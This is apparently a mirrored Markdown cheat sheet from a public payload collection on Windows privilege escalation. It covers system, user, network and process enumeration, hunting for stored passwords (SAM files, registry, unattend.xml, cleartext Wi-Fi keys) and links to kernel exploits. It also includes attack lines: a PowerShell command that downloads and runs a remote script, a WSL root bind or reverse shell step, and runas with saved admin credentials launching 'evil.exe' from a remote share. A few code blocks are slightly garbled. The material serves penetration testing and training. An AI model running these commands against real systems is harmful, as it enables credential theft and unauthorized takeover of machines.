mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 13:25:27 +00:00
408 lines
14 KiB
Markdown
408 lines
14 KiB
Markdown
# Windows - Privilege Escalation
|
||
|
||
## Tools
|
||
|
||
- [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson)
|
||
- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock)
|
||
- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
|
||
- [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
|
||
- [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check)
|
||
- [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless)
|
||
|
||
## Windows Version and Configuration
|
||
|
||
```powershell
|
||
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
|
||
wmic qfe
|
||
```
|
||
|
||
Architecture
|
||
|
||
```powershell
|
||
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
|
||
```
|
||
|
||
List all env variables
|
||
|
||
```powershell
|
||
set
|
||
Get-ChildItem Env: | ft Key,Value
|
||
```
|
||
|
||
List all drives
|
||
|
||
```powershell
|
||
wmic logicaldisk get caption || fsutil fsinfo drives
|
||
wmic logicaldisk get caption,description,providername
|
||
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
|
||
```
|
||
|
||
## User Enumeration
|
||
|
||
Get current username
|
||
|
||
```powershell
|
||
echo %USERNAME% || whoami
|
||
$env:username
|
||
```
|
||
|
||
List user privilege
|
||
|
||
```powershell
|
||
whoami /priv
|
||
```
|
||
|
||
List all users
|
||
|
||
```powershell
|
||
net user
|
||
net users
|
||
whoami /all
|
||
Get-LocalUser | ft Name,Enabled,LastLogon
|
||
Get-ChildItem C:\Users -Force | select Name
|
||
```
|
||
|
||
List logon requirements; useable for bruteforcing
|
||
|
||
```powershell$env:usernadsc
|
||
net accounts
|
||
```
|
||
|
||
Get details about a user (i.e. administrator, admin, current user)
|
||
|
||
```powershell
|
||
net user administrator
|
||
net user admin
|
||
net user %USERNAME%
|
||
```
|
||
|
||
List all local groups
|
||
|
||
```powershell
|
||
net localgroup
|
||
Get-LocalGroup | ft Name
|
||
```
|
||
|
||
Get details about a group (i.e. administrators)
|
||
|
||
```powershell
|
||
net localgroup administrators
|
||
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
|
||
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
|
||
```
|
||
|
||
## Network Enumeration
|
||
|
||
List all network interfaces, IP, and DNS.
|
||
|
||
```powershell
|
||
ipconfig /all
|
||
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
|
||
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
|
||
```
|
||
|
||
List current routing table
|
||
|
||
```powershell
|
||
route print
|
||
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
|
||
```
|
||
|
||
List the ARP table
|
||
|
||
```powershell
|
||
arp -A
|
||
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
|
||
```
|
||
|
||
List all current connections
|
||
|
||
```powershell
|
||
netstat -ano
|
||
```
|
||
|
||
List firware state and current configuration
|
||
|
||
```powershell
|
||
netsh advfirewall firewall dump
|
||
```
|
||
|
||
List all network shares
|
||
|
||
```powershell
|
||
net share
|
||
```
|
||
|
||
SNMP Configuration
|
||
|
||
```powershell
|
||
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
|
||
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
|
||
```
|
||
|
||
## Looting for passwords
|
||
|
||
### SAM and SYSTEM files
|
||
|
||
```powershell
|
||
%SYSTEMROOT%\repair\SAM
|
||
%SYSTEMROOT%\System32\config\RegBack\SAM
|
||
%SYSTEMROOT%\System32\config\SAM
|
||
%SYSTEMROOT%\repair\system
|
||
%SYSTEMROOT%\System32\config\SYSTEM
|
||
%SYSTEMROOT%\System32\config\RegBack\system
|
||
```
|
||
|
||
### Search for file contents**
|
||
|
||
```powershell
|
||
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
|
||
findstr /si password *.xml *.ini *.txt *.config
|
||
```
|
||
|
||
### Search for a file with a certain filename
|
||
|
||
```powershell
|
||
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
|
||
```
|
||
|
||
### Search the registry for key names
|
||
|
||
```powershell
|
||
REG QUERY HKLM /F "password" /t REG_SZ /S /K
|
||
REG QUERY HKCU /F "password" /t REG_SZ /S /K
|
||
```
|
||
|
||
### Read a value of a certain sub key
|
||
|
||
```powershell
|
||
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
|
||
```
|
||
|
||
### Passwords in unattend.xml
|
||
|
||
Location of the unattend.xml files
|
||
|
||
```powershell
|
||
C:\unattend.xml
|
||
C:\Windows\Panther\Unattend.xml
|
||
C:\Windows\Panther\Unattend\Unattend.xml
|
||
C:\Windows\system32\sysprep.inf
|
||
C:\Windows\system32\sysprep\sysprep.xml
|
||
```
|
||
|
||
Example content
|
||
|
||
```powershell
|
||
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
|
||
<AutoLogon>
|
||
<Password>*SENSITIVE*DATA*DELETED*</Password>
|
||
<Enabled>true</Enabled>
|
||
<Username>Administrateur</Username>
|
||
</AutoLogon>
|
||
|
||
<UserAccounts>
|
||
<LocalAccounts>
|
||
<LocalAccount wcm:action="add">
|
||
<Password>*SENSITIVE*DATA*DELETED*</Password>
|
||
<Group>administrators;users</Group>
|
||
<Name>Administrateur</Name>
|
||
</LocalAccount>
|
||
</LocalAccounts>
|
||
</UserAccounts>
|
||
```
|
||
|
||
The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
|
||
|
||
### IIS Web config
|
||
|
||
```powershell
|
||
Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
|
||
```
|
||
|
||
```powershell
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
|
||
C:\inetpub\wwwroot\web.config
|
||
```
|
||
|
||
### Other files
|
||
|
||
```bat
|
||
%SYSTEMDRIVE%\pagefile.sys
|
||
%WINDIR%\debug\NetSetup.log
|
||
%WINDIR%\repair\sam
|
||
%WINDIR%\repair\system
|
||
%WINDIR%\repair\software, %WINDIR%\repair\security
|
||
%WINDIR%\iis6.log
|
||
%WINDIR%\system32\config\AppEvent.Evt
|
||
%WINDIR%\system32\config\SecEvent.Evt
|
||
%WINDIR%\system32\config\default.sav
|
||
%WINDIR%\system32\config\security.sav
|
||
%WINDIR%\system32\config\software.sav
|
||
%WINDIR%\system32\config\system.sav
|
||
%WINDIR%\system32\CCM\logs\*.log
|
||
%USERPROFILE%\ntuser.dat
|
||
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
|
||
%WINDIR%\System32\drivers\etc\hosts
|
||
```
|
||
|
||
### Wifi passwords
|
||
|
||
Find AP SSID
|
||
```bat
|
||
netsh wlan show profile
|
||
```
|
||
|
||
Get Cleartext Pass
|
||
```bat
|
||
netsh wlan show profile <SSID> key=clear
|
||
```
|
||
|
||
## Processes Enumeration and Tasks
|
||
|
||
What processes are running?
|
||
|
||
```powershell
|
||
tasklist /v
|
||
net start
|
||
sc query
|
||
Get-Service
|
||
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
|
||
```
|
||
|
||
Which processes are running as "system"
|
||
|
||
```powershell
|
||
tasklist /v /fi "username eq system"
|
||
```
|
||
|
||
Do you have powershell magic?
|
||
|
||
```powershell
|
||
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
|
||
```
|
||
|
||
List installed programs
|
||
|
||
```powershell
|
||
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
|
||
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
|
||
```
|
||
|
||
Scheduled tasks
|
||
|
||
```powershell
|
||
schtasks /query /fo LIST 2>nul | findstr TaskName
|
||
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
|
||
```
|
||
|
||
Startup tasks
|
||
|
||
```powershell
|
||
wmic startup get caption,command
|
||
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
|
||
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
|
||
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
|
||
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
|
||
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
|
||
```
|
||
|
||
|
||
## PowerSploit's PowerUp
|
||
|
||
Spot the weak service using PowerSploit's PowerUp
|
||
|
||
```powershell
|
||
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
|
||
```
|
||
|
||
## Windows Subsystem for Linux (WSL)
|
||
|
||
Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032)
|
||
|
||
> With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ <distro>.exe --default-user root. Now start your bind shell or reverse.
|
||
|
||
```powershell
|
||
wsl whoami
|
||
./ubuntun1604.exe config --default-user root
|
||
wsl whoami
|
||
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
|
||
```
|
||
|
||
Binary `bash.exe` can also be found in `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe`
|
||
|
||
Alternatively you can explore the `WSL` filesystem in the folder `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\`
|
||
|
||
## Unquoted Service Paths
|
||
|
||
The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first.
|
||
|
||
```powershell
|
||
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:windows\" |findstr /i /v """
|
||
|
||
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
|
||
```
|
||
|
||
## Kernel Exploit
|
||
|
||
List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits)
|
||
|
||
##### #Security Bulletin #KB #Description #Operating System
|
||
- [MS17-017](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-017) [KB4013081] [GDI Palette Objects Local Privilege Escalation] (windows 7/8)
|
||
- [CVE-2017-8464](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-8464) [LNK Remote Code Execution Vulnerability] (windows 10/8.1/7/2016/2010/2008)
|
||
- [CVE-2017-0213](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-0213) [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/2010/2008)
|
||
- [CVE-2018-0833](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-0833) [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2)
|
||
- [CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120) [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1)
|
||
- [MS17-010](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-010) [KB4013389] [Windows Kernel Mode Drivers] (windows 7/2008/2003/XP)
|
||
- [MS16-135](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-135) [KB3199135] [Windows Kernel Mode Drivers] (2016)
|
||
- [MS16-111](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-111) [KB3186973] [kernel api] (Windows 10 10586 (32/64)/8.1)
|
||
- [MS16-098](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098) [KB3178466] [Kernel Driver] (Win 8.1)
|
||
- [MS16-075](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075) [KB3164038] [Hot Potato] (2003/2008/7/8/2012)
|
||
- [MS16-034](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034) [KB3143145] [Kernel Driver] (2008/7/8/10/2012)
|
||
- [MS16-032](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-032) [KB3143141] [Secondary Logon Handle] (2008/7/8/10/2012)
|
||
- [MS16-016](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-016) [KB3136041] [WebDAV] (2008/Vista/7)
|
||
- [MS16-014](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-014) [K3134228] [remote code execution] (2008/Vista/7)
|
||
...
|
||
- [MS03-026](./MS03-026) [KB823980] [Buffer Overrun In RPC Interface] (/NT/2000/XP/2003)
|
||
|
||
|
||
## Runas
|
||
|
||
Use the `cmdkey` to list the stored credentials on the machine.
|
||
|
||
```powershell
|
||
cmdkey /list
|
||
Currently stored credentials:
|
||
Target: Domain:interactive=WORKGROUP\Administrator
|
||
Type: Domain Password
|
||
User: WORKGROUP\Administrator
|
||
```
|
||
|
||
Then you can use `runas` with the `/savecred` options in order to use the saved credentials.
|
||
The following example is calling a remote binary via an SMB share.
|
||
```powershell
|
||
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
|
||
```
|
||
|
||
## References
|
||
|
||
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
|
||
* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
|
||
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
|
||
* [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/)
|
||
* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
|
||
* [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
|
||
* [Remediation for Microsoft Windows Unquoted Service Path Enumeration Vulnerability - September 18th, 2016 - Robert Russell](https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/)
|
||
* [Pentestlab.blog - WPE-01 - Stored Credentials](https://pentestlab.blog/2017/04/19/stored-credentials/)
|
||
* [Pentestlab.blog - WPE-02 - Windows Kernel](https://pentestlab.blog/2017/04/24/windows-kernel-exploits/)
|
||
* [Pentestlab.blog - WPE-03 - DLL Injection](https://pentestlab.blog/2017/04/04/dll-injection/)
|
||
* [Pentestlab.blog - WPE-04 - Weak Service Permissions](https://pentestlab.blog/2017/03/30/weak-service-permissions/)
|
||
* [Pentestlab.blog - WPE-05 - DLL Hijacking](https://pentestlab.blog/2017/03/27/dll-hijacking/)
|
||
* [Pentestlab.blog - WPE-06 - Hot Potato](https://pentestlab.blog/2017/04/13/hot-potato/)
|
||
* [Pentestlab.blog - WPE-07 - Group Policy Preferences](https://pentestlab.blog/2017/03/20/group-policy-preferences/)
|
||
* [Pentestlab.blog - WPE-08 - Unquoted Service Path](https://pentestlab.blog/2017/03/09/unquoted-service-path/)
|
||
* [Pentestlab.blog - WPE-09 - Always Install Elevated](https://pentestlab.blog/2017/02/28/always-install-elevated/)
|
||
* [Pentestlab.blog - WPE-10 - Token Manipulation](https://pentestlab.blog/2017/04/03/token-manipulation/)
|
||
* [Pentestlab.blog - WPE-11 - Secondary Logon Handle](https://pentestlab.blog/2017/04/07/secondary-logon-handle/)
|
||
* [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/)
|
||
* [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/) |